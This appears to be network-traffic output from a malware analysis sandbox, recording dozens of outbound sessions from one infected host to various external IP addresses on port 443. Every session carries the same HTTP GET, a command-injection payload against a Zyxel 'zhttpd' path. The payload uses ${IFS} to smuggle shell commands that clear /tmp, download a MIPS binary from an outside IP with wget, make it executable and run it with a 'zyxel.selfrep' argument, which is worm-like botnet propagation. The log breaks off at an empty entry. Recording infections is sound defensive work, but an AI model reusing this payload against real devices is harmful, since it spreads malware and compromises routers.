                                            Jan 14, 2024 15:50:45.538389921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5902192.168.2.235487039.251.247.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538408041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5903192.168.2.2342944132.32.30.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538425922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5904192.168.2.2339768132.44.253.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538486958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5905192.168.2.234333012.79.48.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538512945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5906192.168.2.235251454.177.29.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538522959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5907192.168.2.234918612.226.239.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538573980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5908192.168.2.2336442120.42.173.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538604975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5909192.168.2.235691058.39.205.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538657904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5910192.168.2.2342588167.139.185.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538680077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5911192.168.2.2355104124.174.97.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538712025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5912192.168.2.2356064130.115.223.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538738966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5913192.168.2.2348740166.59.129.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538793087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5914192.168.2.2360370152.92.188.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538794994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5915192.168.2.234276246.210.148.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538969040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5916192.168.2.2350322174.110.16.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539005995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5917192.168.2.2339302144.246.232.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539016962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5918192.168.2.236050635.127.49.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539041996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5919192.168.2.2346522216.115.10.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539060116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5920192.168.2.235664884.224.235.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539141893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5921192.168.2.2357370219.72.104.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539163113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5922192.168.2.23507089.232.163.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539176941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5923192.168.2.2339614103.22.172.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539244890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5924192.168.2.23342604.119.50.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539280891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5925192.168.2.235886084.244.23.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539307117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5926192.168.2.235992827.167.194.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539351940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5927192.168.2.2355650182.109.51.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539376974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5928192.168.2.2353346190.107.147.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539550066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5929192.168.2.2359660111.94.19.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539581060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5930192.168.2.2352236157.170.173.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539581060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5931192.168.2.2344100171.243.54.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539609909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5932192.168.2.235138836.217.176.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539676905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5933192.168.2.2334484177.220.227.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539722919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5934192.168.2.233619097.232.28.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539742947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5935192.168.2.2350536155.123.237.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539812088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5936192.168.2.2335938160.178.82.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539836884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5937192.168.2.2356736161.228.28.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539839983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5938192.168.2.2340296176.111.111.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539863110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5939192.168.2.2355144203.172.110.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539885998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5940192.168.2.233664659.145.215.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539947033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5941192.168.2.2337484143.115.154.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.539978027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5942192.168.2.2333520212.55.113.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540002108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5943192.168.2.2346372118.207.184.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540046930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5944192.168.2.2352458131.81.166.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540050983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5945192.168.2.233417652.73.176.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540127993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5946192.168.2.233899662.158.109.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540165901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5947192.168.2.234326852.63.187.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540193081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5948192.168.2.234975434.138.128.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540226936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5949192.168.2.235710275.7.7.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540236950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5950192.168.2.234060460.140.29.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540296078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5951192.168.2.235107288.29.165.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540335894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5952192.168.2.2346306205.208.141.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540359974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5953192.168.2.2336304221.255.146.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540375948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5954192.168.2.235473699.191.115.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540431023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5955192.168.2.233690866.192.63.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540457964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5956192.168.2.235832619.102.102.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540493011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5957192.168.2.2350504196.152.113.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540504932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5958192.168.2.233813262.168.205.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540548086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5959192.168.2.235758289.63.82.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540584087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5960192.168.2.233546878.199.58.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540611982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5961192.168.2.2354526164.244.221.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540642023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5962192.168.2.2351204161.87.33.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540663958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5963192.168.2.235696824.103.0.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540695906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5964192.168.2.2360004128.249.80.7443
                                            TimestampBytes transferredDirectionData
